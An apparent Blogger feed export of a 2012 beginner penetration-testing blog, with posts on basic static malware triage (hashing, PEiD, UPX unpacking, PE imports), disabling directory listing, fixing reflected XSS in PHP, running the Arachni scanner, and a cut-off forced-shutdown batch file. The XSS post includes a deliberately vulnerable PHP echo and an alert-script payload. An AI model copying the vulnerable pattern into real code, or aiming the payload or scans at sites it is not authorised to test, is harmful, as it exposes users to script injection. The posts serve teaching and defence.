tag:blogger.com,1999:blog-76517098611704178182024-03-06T01:12:39.384-08:00Sudhir @ PentesterThis Blog is about Penetration Testing with Tools and manually for starters & System Tips and Tricks.sudhirhttp://www.blogger.com/profile/07016075449331701681noreply@blogger.comBlogger16125tag:blogger.com,1999:blog-7651709861170417818.post-69545584262390551782012-05-22T06:29:00.004-07:002012-05-22T06:29:44.951-07:00Basic Information Gathering of Analysis on Malware (Part 1)<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
<div style="text-align: justify;">
<b>Basic Information Gathering of Analysis on Malware</b> (<b>Part 1</b>)</div>
<div style="text-align: justify;">
--------------------------------------------------------------------</div>
<div style="text-align: justify;">
Malware (spyware,Rootkits,worms,trojans,virus etc.), a malicious software designed to disrupt computer operation, gather sensitive information, or gain unauthorized access to computer systems.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
The first thing you do when your system is infected is scan with some antivirus softwares and anti malwares and so on , This tut shows how to analyse</div>
<div style="text-align: justify;">
it and bring out its functionality . This first thing we are doing here is info gathering of analysis of malware , its the first basic part to start with and go on advanced depending on the complexity of malware.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
We have 2 types of Analysis Static and Dynamic.</div>
<div style="text-align: justify;">
<b>Static :- Analyzing code or structure of program.</b></div>
<div style="text-align: justify;">
<b>Dynamic:- Actually running the program to see wat its doing.</b></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Note:</div>
<div style="text-align: justify;">
-----</div>
<div style="text-align: justify;">
<b>This tut is not on advanced part of analyzing malware or disassembly . Hope if my study goes on learning advanced things will be first to post here... :)</b></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
note 2:</div>
<div style="text-align: justify;">
-------</div>
<div style="text-align: justify;">
<b>first go through PE (portable executable) file format and structure. basically PE contains inofrmation necessary for windows os loader.</b></div>
<div style="text-align: justify;">
<b>for analyzing we need actually to concentrate on PE file header which includes information about code ,type of application , required library functions and space requirements. And know about dll and its functions (import and export funstions).</b></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<b>Basic info Gathering of Static Analysis:</b></div>
<div style="text-align: justify;">
----------------------------------------</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Now lets take a malware ... </div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
or create urself a trojan </div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
malware is uniquely identified by a hash.The malicious software is run through hashing program that produces hash which produces a hash that identifies a malware.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
to fingerprint it we use a tool called md5deep there are other tools also.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
usage: md5deep 123.exe (malware file name).</div>
<div style="text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgf3BAyPYZ_KMe97htcXSF_QAcDiTY1uChxKg3_p9oQylKMte0A1fUOUe32ecqBIpYrIIA7Oki5if4c26AJFVasnOtnsU7UGwCRNDJcdcSNuY9ideGT8SJWJ5vrQe6OqMw1rPxdikc_74Q/s1600/1.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="179" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgf3BAyPYZ_KMe97htcXSF_QAcDiTY1uChxKg3_p9oQylKMte0A1fUOUe32ecqBIpYrIIA7Oki5if4c26AJFVasnOtnsU7UGwCRNDJcdcSNuY9ideGT8SJWJ5vrQe6OqMw1rPxdikc_74Q/s640/1.PNG" width="640" /></a></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
in the above screen shot u see a hash this hash can be used to search online to see if its already been identified.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Now here comes the problem u donno that the malware is packed or not.beacuse wen its packed , it becomes difficult to analysor detect it.</div>
<div style="text-align: justify;">
its normally packed with some kind of wrapper program . to identify or detect with wat packer that this malware has been packed we use tool called...</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<b>PEiD</b></div>
<div style="text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhh1L8wDKj1_poGPkZdxLUSsvg0EdVXTxd-MsRNTB3IeQUxASpMOSd0BseHIaFzQANIqf4T0DQnK8gCmCs3TuXucSKiyOwr6D_7y6f2BgghmnxzdNlMZijcfxjnvnLiwhFE_cJI5hBXv_w/s1600/2.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="227" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhh1L8wDKj1_poGPkZdxLUSsvg0EdVXTxd-MsRNTB3IeQUxASpMOSd0BseHIaFzQANIqf4T0DQnK8gCmCs3TuXucSKiyOwr6D_7y6f2BgghmnxzdNlMZijcfxjnvnLiwhFE_cJI5hBXv_w/s400/2.PNG" width="400" /></a></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
from this we can know its packed with upx paker.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
to unpack it there's program called upx (you will get it in sourceforge.net)</div>
<div style="text-align: justify;">
to unpack usage : upx -d filename.exe</div>
<div style="text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgxdonPR-QINShOK40Hi418mVDeqSDfxrtDYlliCyGvHGSZakYvm6R3JRSNvG_yTeNe4mF6cSZW5K81YN-zGNYZj9oha2p0k-O6Ouy9eND3M3Qh1ZMu0BY7jEdaxAAcT7HLVUSycMllJT0/s1600/3.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="144" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgxdonPR-QINShOK40Hi418mVDeqSDfxrtDYlliCyGvHGSZakYvm6R3JRSNvG_yTeNe4mF6cSZW5K81YN-zGNYZj9oha2p0k-O6Ouy9eND3M3Qh1ZMu0BY7jEdaxAAcT7HLVUSycMllJT0/s640/3.PNG" width="640" /></a></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
now its been unpacked.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
now the next step goes like we ned to see that what kind of linked functions (loading dlls)its using. </div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
we have tool called dependency walker. now load the file on it (see below)</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiVcZb45OlTvzxd082Xjwb0l_bQ81tOV88DdGlEMstfegbZBZHcURbBCRICPbu_bE8w4DrAmSQ6hUDXccIgasmgCgjJ3mMbSQVTcbgDlCt9raXsLNgBvKeGcJHcUiIqL2h13Cg9xy4l_qQ/s1600/4.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="272" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiVcZb45OlTvzxd082Xjwb0l_bQ81tOV88DdGlEMstfegbZBZHcURbBCRICPbu_bE8w4DrAmSQ6hUDXccIgasmgCgjJ3mMbSQVTcbgDlCt9raXsLNgBvKeGcJHcUiIqL2h13Cg9xy4l_qQ/s640/4.PNG" width="640" /></a></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
1.)here in right pane u can observe many dll's u its the dll's u imported</div>
<div style="text-align: justify;">
2.)imported functions</div>
<div style="text-align: justify;">
3.)when malware imports function by ordinal you can find which function is being imported by looking at ordinal value.</div>
<div style="text-align: justify;">
4.)additional info about the dll tat would be load if you run the program.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
A common trojan or keylogger has interesting dll and fuctions will have like</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Kernel32.dll:<span class="Apple-tab-span" style="white-space: pre;"> </span>user32.dll<span class="Apple-tab-span" style="white-space: pre;"> </span> GDI32.dll,Shell32.dll,Advapi32.dll etc.</div>
<div style="text-align: justify;">
-------------<span class="Apple-tab-span" style="white-space: pre;"> </span>-----------</div>
<div style="text-align: justify;">
(functions)<span class="Apple-tab-span" style="white-space: pre;"> </span>Setwindowshookexw</div>
<div style="text-align: justify;">
CreateFilew<span class="Apple-tab-span" style="white-space: pre;"> </span>Registerclassexw</div>
<div style="text-align: justify;">
findfirstfilew<span class="Apple-tab-span" style="white-space: pre;"> </span>registerhotkey</div>
<div style="text-align: justify;">
findnextfilew<span class="Apple-tab-span" style="white-space: pre;"> </span>setwindoetextw</div>
<div style="text-align: justify;">
etc ..........<span class="Apple-tab-span" style="white-space: pre;"> </span>etc......</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
)Kernel32 tells us that software can create and manipulate process.here above findnextfile and firstfile functions</div>
<div style="text-align: justify;">
which are interesting as we can search through directories.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
)User32.dll has function like setwindowhook is commonly used in spyware and keyloggers.</div>
<div style="text-align: justify;">
)GDI32 is for graphics related tat program probably has GUI </div>
<div style="text-align: justify;">
)shell32 can lauch other programs</div>
<div style="text-align: justify;">
)Advapi32 uses the registry.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
As we said that to take a look at PE headers </div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
We have sections in PE file like:</div>
<div style="text-align: justify;">
.text (contains executable code) , .rdata(holds read only data), .data(global data throughout) , .rsrc (resources needed by executable</div>
<div style="text-align: justify;">
.idata(stores important function information & if not present it will be in rdata) , .reloc (info. for relocation of library files) etc...</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
we have a tool called PEview (see below)</div>
<div style="text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhXUFQYQtx8PTM3TqCSxwLiqR-j_dcubmbax7gzNXg4vdLyZl4fTvksIvJRDerewnqIhFrxgx_DOO8W6fDSF6Y94_RWSPhAeb-ezGJ4azpyq_ryS97HknQORSVgx-YlXIJ5qW08m3mAjNM/s1600/5.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="330" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhXUFQYQtx8PTM3TqCSxwLiqR-j_dcubmbax7gzNXg4vdLyZl4fTvksIvJRDerewnqIhFrxgx_DOO8W6fDSF6Y94_RWSPhAeb-ezGJ4azpyq_ryS97HknQORSVgx-YlXIJ5qW08m3mAjNM/s640/5.PNG" width="640" /></a></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
u can observe the machine info and time stamp when it wa compiled which is useful.</div>
<div style="text-align: justify;">
we can ingnore the DOS_Header and signature.</div>
<div style="text-align: justify;">
Image_Optinal_Header includes important information and has subsystem ,which shows there is console or GUI program.</div>
<div style="text-align: justify;">
Image_Section_Header also contains important info.These are used to describe each section in PE file.Sections cn be consistent</div>
<div style="text-align: justify;">
from exe to other exe files.</div>
<div style="text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgyruOG2_dwhEVaabY1Uwbldw6B9fAUEN3P90ykWPth8okHk-i6eRH_SGsvo66mJSPZQw2jWl-7nKiJ9bVPQaFeJhC_u0eYplhevmXN3qj22AOw4AApOh06OqC3VUy7ZWkdaOXuYQR8K24/s1600/6.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="316" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgyruOG2_dwhEVaabY1Uwbldw6B9fAUEN3P90ykWPth8okHk-i6eRH_SGsvo66mJSPZQw2jWl-7nKiJ9bVPQaFeJhC_u0eYplhevmXN3qj22AOw4AApOh06OqC3VUy7ZWkdaOXuYQR8K24/s640/6.PNG" width="640" /></a></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
here u can observer on thing is the .data section is that</div>
<div style="text-align: justify;">
virtual size is much large than raw data size (u can ignore if there is small difference)</div>
<div style="text-align: justify;">
this alone will not tell its suspicious. it is likely unpacked.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<b>{{Continued with Basic info gathering of Dynamic Analysis. sooon }}</b></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<br /></div>
</div>sudhirhttp://www.blogger.com/profile/07016075449331701681noreply@blogger.com7tag:blogger.com,1999:blog-7651709861170417818.post-71666173399563676262012-05-16T05:38:00.003-07:002012-05-16T05:38:43.909-07:00Disable Directory Listing<div dir="ltr" style="text-align: left;" trbidi="on">
Mostly you observe this directory listing in many websites :<br />
<br />
Ex: www.demo.com/<br />
<br />
like traversing direcotries trying <b>www.demo.com/images/</b><br />
there is a possibilty that an attacker tries to look for hidden directories and there is possibility<br />
of finding possible web confg files too.<br />
<br />
to disable this<br />
<br />
<b>In Apache:</b><br />
<b>---------------</b><br />
goto file called httpd.conf<br />
<br />
and search for:<br />
<b><br /></b><br />
<b>Options Indexes FollowSymLinks </b><br />
<b><br /></b><br />
now just add ' - ' before indexes like :<br />
<br />
<b>Options -</b><b>Indexes FollowSymLinks </b>
<br />
<b><br /></b><br />
<br />
<b>In IIS 7:</b><br />
<b>----------</b><br />
Open IIS manager and go to the level or navigate to manage.<br />
then in "<b>Feature view" </b>. Double-click " <b>Directory browsing</b> "<br />
<br />
In <b> " Actions " </b>pane click <b>Disable </b>if directory browsing is enabled.</div>sudhirhttp://www.blogger.com/profile/07016075449331701681noreply@blogger.com2tag:blogger.com,1999:blog-7651709861170417818.post-32091723990130037422012-04-22T23:11:00.003-07:002012-04-29T23:38:50.985-07:00Preventing XSS (PHP)<div dir="ltr" style="text-align: left;" trbidi="on">
Lets take an example :<br />
<br />
<br />
<html><br />
<br />
<body><br />
<br />
<form action="xss.php" method="POST"><br />
<br />
Val: <input type="text" name="val"><br />
<input type="submit" name="valu" value="submit"><br />
</form><br />
</body><br />
</html><br />
<br />
<?php<br />
<br />
$val=$_POST['val'];<br />
if ($_POST['valu']=='submit')<br />
{<br />
echo $val;<br />
}<br />
?><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
Here u can see that when we try to enter a value it directly echo's back to us..see below:<br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEihvCJc_D_RmK9YQwLLKTrTQJJBoo9as75dgyJwddgwJoNJGKKkbUiAhiFckHgmF1BKqy9swkYm3VvQQxgjaNZs55DqvUQ9aWPf70CKN5ixo_we5tYH4X3h1o5VS4DM5xB6bbiZLoy12dM/s1600/xss1.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em; text-align: center;"><img border="0" height="152" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEihvCJc_D_RmK9YQwLLKTrTQJJBoo9as75dgyJwddgwJoNJGKKkbUiAhiFckHgmF1BKqy9swkYm3VvQQxgjaNZs55DqvUQ9aWPf70CKN5ixo_we5tYH4X3h1o5VS4DM5xB6bbiZLoy12dM/s320/xss1.PNG" width="320" /></a>
<br />
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
and when i try to enter the below html code ..it is running the script.<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh19zW2txM952VN8CEjdxZsYSuOnAsQkjbgidqBteRrGQP8ZgtRy3ILemBOfiLDefkd17PGJr0ZvhbC4dxkkSVtJZ2jezEuRghNzGeUsC0MLKksKgKNDKDVcUu1xPGqCQd1THtFBujGM0o/s1600/xss2.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em; text-align: center;"><img border="0" height="53" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh19zW2txM952VN8CEjdxZsYSuOnAsQkjbgidqBteRrGQP8ZgtRy3ILemBOfiLDefkd17PGJr0ZvhbC4dxkkSVtJZ2jezEuRghNzGeUsC0MLKksKgKNDKDVcUu1xPGqCQd1THtFBujGM0o/s400/xss2.PNG" width="400" /></a>
<br />
<br />
from this we know that it runs .. so lets now try to run a javscript<br />
<script>alert("xss")</script><br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiMTGTN0mQM8SPhVJmavTDXgU313QHELOifasf0OJsKQFolsNx24qsrH4UeO8py4ZTTu0yo2GQQYVlOA7vq_2u1nr74fPnOdMvH4om-FWWxMx6NWZffZJZCfLzlM4l9AZeounxDlQYByWI/s1600/xss3.PNG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="200" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiMTGTN0mQM8SPhVJmavTDXgU313QHELOifasf0OJsKQFolsNx24qsrH4UeO8py4ZTTu0yo2GQQYVlOA7vq_2u1nr74fPnOdMvH4om-FWWxMx6NWZffZJZCfLzlM4l9AZeounxDlQYByWI/s400/xss3.PNG" width="400" /></a><br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Now to prevent this we use html function called "htmlentities".<br />
<br />
now the code will be:<br />
<br />
<br />
<?php<br />
<br />
$val=htmlentities($_POST['val'],ENT_QUOTES,'UTF-8');<br />
if ($_POST['valu']=='submit')<br />
{<br />
echo $val;<br />
}<br />
?><br />
<div>
<br /></div>
<div>
now try to run the script :: it doesnt gets executed.... :)</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgk3ZcyG26p5Cf66xTqyaXZb9FZt5LY7EG03I6SIJakNJ0fX9bu-EA_zwtyVURQFastTA31FmMvESBG7jCb-8_No3JjBNYpUi7uaNoSPd80g7VfRCi1GVfDjZRF-4CvUCa6oWbR2wKoKA0/s1600/xss4.PNG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgk3ZcyG26p5Cf66xTqyaXZb9FZt5LY7EG03I6SIJakNJ0fX9bu-EA_zwtyVURQFastTA31FmMvESBG7jCb-8_No3JjBNYpUi7uaNoSPd80g7VfRCi1GVfDjZRF-4CvUCa6oWbR2wKoKA0/s1600/xss4.PNG" /></a></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
cheers!..
</div>
<div>
<br /></div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://www.webweaver.nu/clipart/img/nature/dogs/dog-cartoon.gif" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://www.webweaver.nu/clipart/img/nature/dogs/dog-cartoon.gif" /></a></div>
<div>
<br /></div>
<br /></div>sudhirhttp://www.blogger.com/profile/07016075449331701681noreply@blogger.com5tag:blogger.com,1999:blog-7651709861170417818.post-88366746708399578142012-01-09T21:45:00.001-08:002012-01-10T03:26:03.243-08:00Arachni Web scanner (CLI & WEB GUI)<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
Download the CDE package from:<br />
<br />
<a href="https://github.com/Zapotek/arachni/downloads">https://github.com/Zapotek/arachni/downloads</a> <br />
<br />
<br />
Linux users enjoy the privilege of a CDE package which is a compressed
archive and contains a full preconfigured Linux environment in the form
of a sandbox.<br />
<br />
Quick Basic Usage of Arachni:<br />
<br />
To see help type :<br />
<br />
<br />
<pre><code>$ arachni -h</code></pre>
<br />
You can check the options here.<br />
<br />
<br />
<br />
You can simply run Arachni like:<br />
<br />
<pre><code>$ arachni http://test.com</code></pre>
<pre><code> </code></pre>
which will load all modules, the plugins under <br />
<pre><code> </code></pre>
<pre><code>/plugins/defaults</code></pre>
and audit all forms, links and cookies.<br />
<br />
In the following example all modules will be run against <i>http://site.com</i>, auditing links/forms/cookies and following subdomains —with verbose output enabled.<br />
<br />
The results of the audit will be saved in the the file <i>site.com.afr</i>.<br />
<br />
<pre><code>$ arachni -fv http://site.com --report=afr:outfile=site.com.afr</code></pre>
<pre><code> </code></pre>
<pre><code></code></pre>
You can do module loading by following commands using wildcard.:<br />
<br />
<br />
To load all <i>xss</i> modules using a wildcard:<br />
<br />
<pre><code>$ arachni http://example.net --mods=xss_*</code></pre>
<br />
To load all <i>audit</i> modules using a wildcard:<br />
<pre><code>$ arachni http://example.net --mods=audit*</code></pre>
<br />
To exclude only the <i>csrf</i> module:<br />
<pre><code>$ arachni http://example.net --mods=*,-csrf</code></pre>
<br />
Or you can mix and match; to run everything but the <i>xss</i> modules:<br />
<pre><code>$ arachni http://example.net --mods=*,-xss_*</code></pre>
<pre><code> </code></pre>
<h4>
<u>Performing a full scan quickly</u></h4>
The <i>full </i>profile adds header auditing to the defaults.<br />
<br />
You can use it like:<br />
<pre><code>$ arachni --load-profile=profiles/full.afp http://site.net</code></pre>
<pre><code> </code></pre>
<pre><code><b><span style="font-size: large;">You have lots of options/flags/modes to explore here </span></b></code></pre>
<pre><code><b><span style="font-size: large;">based on ur usage</span>.</b> </code></pre>
<br />
<br />
for example we have Debug mode :<br />
<br />
<br />
When this flag is enabled the system will output a lot of messages detailing what’s happening internally.<br />
If you don’t want to be flooded by annoying and obscure messages you
can pipe debugging output to a separate file when running Arachni using:<br />
<pre><code>
$ arachni -pv --mods=xss http://localhost/~zapotek/tests/forms/xss.php --debug</code></pre>
<pre><code> </code></pre>
<pre>The debug.log file will contain something like:</pre>
<pre><code> </code></pre>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg1tYlQvhhisq_LErR6P0xrBbvyREL1Et_71o1bsFjomoIH4jskmzULvBhk1Kb3ged0b4mgUR1R2-MTlybf63nqo2eHANTJoNhCS2RmDkp1I7ZbDqZMpqocK8cd-AQoS2fmVpaCZKqiWY8/s1600/1212.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="363" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg1tYlQvhhisq_LErR6P0xrBbvyREL1Et_71o1bsFjomoIH4jskmzULvBhk1Kb3ged0b4mgUR1R2-MTlybf63nqo2eHANTJoNhCS2RmDkp1I7ZbDqZMpqocK8cd-AQoS2fmVpaCZKqiWY8/s400/1212.PNG" width="400" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEixW0KSulp0hl3yrXjtViNmgWKdIgm_-khZLezzbmpikHoDUEfgJwh41RZY5XDJyNIVkrb6oVtfqLdUtpjUQVHQBDhfOE7LN2OzAgR9gBSHKE4rOF4HzN2XoiUD5ATIs4KwR0yKwBr8pKQ/s1600/1213.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="316" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEixW0KSulp0hl3yrXjtViNmgWKdIgm_-khZLezzbmpikHoDUEfgJwh41RZY5XDJyNIVkrb6oVtfqLdUtpjUQVHQBDhfOE7LN2OzAgR9gBSHKE4rOF4HzN2XoiUD5ATIs4KwR0yKwBr8pKQ/s400/1213.PNG" width="400" /></a></div>
<pre><code> </code></pre>
<br />
<u><span style="font-size: x-large;">Arachni WEB UI</span></u><br />
<br />
now unzip it ,goto the folder location you will find the arachni console and web UI<br />
<br />
There are two ways to start WEB UI :<br />
<br />
just type in shell prompt : <br />
<pre><code> </code></pre>
<pre><code>$ arachni_web_autostart</code></pre>
<br />
<br />
This will setup a local Dispatcher, the WebUI server and even open up your browser.<br />
<br />
or<br />
<br />
<br />
Start a Dispatcher like:<br />
<pre><code>$ arachni_rpcd </code></pre>
<pre><code> </code></pre>
Then start the WebUI by running:<br />
<pre><code>$ arachni_web</code></pre>
<pre><code> </code></pre>
<pre><b>And finally open up a browser window and visit: http://localhost:4567/</b><code> </code></pre>
<pre><code>
</code></pre>
<pre>The WebUI supports <span class="caps">HTTP</span> Basic auth which you can configure using the Username and Password<code> </code></pre>
<pre><code> </code></pre>
<div style="text-align: justify;">
The WebUI can serve many purposes ranging from just a simple way to use Arachni to a Grid construction and management interface.</div>
<div>
</div>
<div style="text-align: justify;">
You can use it to perform and monitor a single scan, hassle-free, via
any web-browser enabled device or use it to setup a worldwide High
Performance Grid of Arachni scanners ready to combine their resources in
order to perform lightning fast audits.</div>
<pre><code> </code></pre>
<pre>The first page, so eloquently entitled ‘Start a scan’, allows you to do just that.</pre>
<br />
A single scan can be performed easily enough, you just select a Dispatcher, enter the <span class="caps">URL</span> of your target and hit ‘Launch Scan’.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://a248.e.akamai.net/assets.github.com/img/a6ecb23f1f82da44a1c0d717a4222b15a7e8555b/687474703a2f2f7a61706f74656b2e6769746875622e636f6d2f61726163686e692f77696b692f696d616765732f73696d706c655f7363616e2e706e67" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="102" src="https://a248.e.akamai.net/assets.github.com/img/a6ecb23f1f82da44a1c0d717a4222b15a7e8555b/687474703a2f2f7a61706f74656b2e6769746875622e636f6d2f61726163686e692f77696b692f696d616765732f73696d706c655f7363616e2e706e67" width="400" /></a></div>
<br />
<br />
<div style="text-align: justify;">
A high performance scan utilizes more than one Arachni Instance to perform the audit.</div>
<div style="text-align: justify;">
<br />
The master instance will perform the crawl and then calculate and distribute the workload amongst its slaves.<br />
This allows scan-time to be severely decreased.</div>
<br />
Once you have set up a Grid (i.e. configured at least 2 Dispatchers
to have each other as neighbours) the “Start a scan” screen will change
to this:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://a248.e.akamai.net/assets.github.com/img/7fd8141d35b54d85bdf5456d0997244f4eafdf6e/687474703a2f2f7a61706f74656b2e6769746875622e636f6d2f61726163686e692f77696b692f696d616765732f6870675f7363616e5f636865636b626f782e706e67" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="121" src="https://a248.e.akamai.net/assets.github.com/img/7fd8141d35b54d85bdf5456d0997244f4eafdf6e/687474703a2f2f7a61706f74656b2e6769746875622e636f6d2f61726163686e692f77696b692f696d616765732f6870675f7363616e5f636865636b626f782e706e67" width="400" /></a></div>
<br />
<br />
<h2 style="color: black;">
<u>Modules and Plug-ins</u></h2>
The <i>Modules</i> and <i>Plug-ins</i> pages are pretty self-explanatory, they simply allow you to select which components to load.<br />
<h2>
<u>Settings</u></h2>
Nothing special, these options have the same effects as their <span class="caps">CLI</span>(Command Line Interface) counterparts.<br />
<h2>
<u>Reports</u></h2>
This page contains a list of audit reports along with the option to convert them to a fair amount of different formats. <br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://a248.e.akamai.net/assets.github.com/img/78dbc74942de12ab69cfd37454af12b087963f7a/687474703a2f2f7a61706f74656b2e6769746875622e636f6d2f61726163686e692f77696b692f696d616765732f7265706f7274732e706e67" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="84" src="https://a248.e.akamai.net/assets.github.com/img/78dbc74942de12ab69cfd37454af12b087963f7a/687474703a2f2f7a61706f74656b2e6769746875622e636f6d2f61726163686e692f77696b692f696d616765732f7265706f7274732e706e67" width="640" /></a></div>
<br />
<br />
<h2>
<u>Log</u></h2>
Not much to add to this, the name says it all:<br />
<img height="219" src="https://a248.e.akamai.net/assets.github.com/img/b7b0d7aea7a0eaced6082ddb34b71e08bbcef142/687474703a2f2f7a61706f74656b2e6769746875622e636f6d2f61726163686e692f77696b692f696d616765732f6c6f672e706e67" width="640" /><br />
<br />
<h1>
<u>Shutdown</u></h1>
You can kill the WebUI by sending <i>Ctrl+C</i> to the console from which you started it.<br />
<br />
:)...:)<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhtzXx_OBYTBNWnI_Dv68yYzxjulA8RBfGVy-TY5d89pDbVGKPx8rNQgE-NCaJ22SLHaNrnY1bMTi4ao_ZVC8b51-fq0qKo_km8n-IXC6BKATqYgEnjAtGm8o-16PaB4t2Lrw8VKLa4Y9o/s1600/dog.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhtzXx_OBYTBNWnI_Dv68yYzxjulA8RBfGVy-TY5d89pDbVGKPx8rNQgE-NCaJ22SLHaNrnY1bMTi4ao_ZVC8b51-fq0qKo_km8n-IXC6BKATqYgEnjAtGm8o-16PaB4t2Lrw8VKLa4Y9o/s1600/dog.jpg" /></a></div>
<br />
<br /></div>sudhirhttp://www.blogger.com/profile/07016075449331701681noreply@blogger.com0tag:blogger.com,1999:blog-7651709861170417818.post-8695582603522182412012-01-09T21:22:00.000-08:002012-01-10T03:38:54.801-08:00How To Shutdown A Computer With A Cell Phone<div dir="ltr" style="text-align: left;" trbidi="on">
First you need to create a batch file to perform shutdown etc .you can write them down yourself.<br />
<br />
* Open your notepad and type the following<br />
<br />
EX:
c:\windows\system32\shutdown -s -f -t 00<br />
or<br />
shutdown -s -t 10 -c “shutting down”<br />
And save it as shutdown.bat (Executable file)<br />
